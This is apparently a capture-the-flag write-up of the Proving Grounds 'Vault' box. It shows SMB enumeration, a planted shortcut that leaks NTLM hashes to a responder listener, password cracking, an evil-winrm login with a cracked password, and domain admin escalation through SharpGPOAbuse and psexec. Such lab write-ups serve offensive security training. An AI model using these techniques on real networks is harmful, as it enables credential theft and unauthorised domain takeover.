Vault
Writeup for Vault from offsec Proving Grounds
Information Gathering
sudo nmapAutomator.sh 192.168.131.172 all
Service Enumeration
SMB (Port 139/445)
Seems like we have anonymous access to shares. But there doesn't seem to be any useful files in the share.
Let's use of impacket's lookupsid which performs brute-forcing of Windows SID’s to identify users/groups on the remote target.
lookupsid.py Anonymous@192.168.131.172
Using some vim magic, we extract the users only.
Next, we can try kerberoasting with the usernames we have. However, we get nothing.
So I actually missed out on the fact that DocumentsShare
is writeable.
Exploit
As we are attacking a windows machine, we can upload a file through the SMB Share as a Windows shortcut to specify an icon that points to our attacking machine. Whenever the user accesses this file, it will try to load the icon and cause a request to be sent to our attacking machine to look f e with the user account's username. This request will contain the NTLM hash of the account.
Let's start a responder to listen for the request.
sudo responder -I tun0 -v
We can then copy the hash into a file and crack it using john.
Then we are able to get anirudh credentials.
evil-winrm -i 192.168.131.172 -u anirudh -p SecureHM
Privesc
We see that there is already a KillExplorer.ps1
file, however, this just seems like a script to access the writeable SMB share earlier
Tried using winPEAS
however, I was unable to find anything useful.
We can use the Get-NetGPO command from Powerview to get all the policies with details.
We then use the Get-GPPermission command to get the permission level for the security principals on the GPO.
Next, we can use SharpGPOAbuse.exe and specify to add anirudh
account into the local admin group.
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
Then we update the local group policy.
gpudate /force
Let's see if this worked.
net localgroup Administrators
We use psexec.py
from Impacket to gain access.
Last updated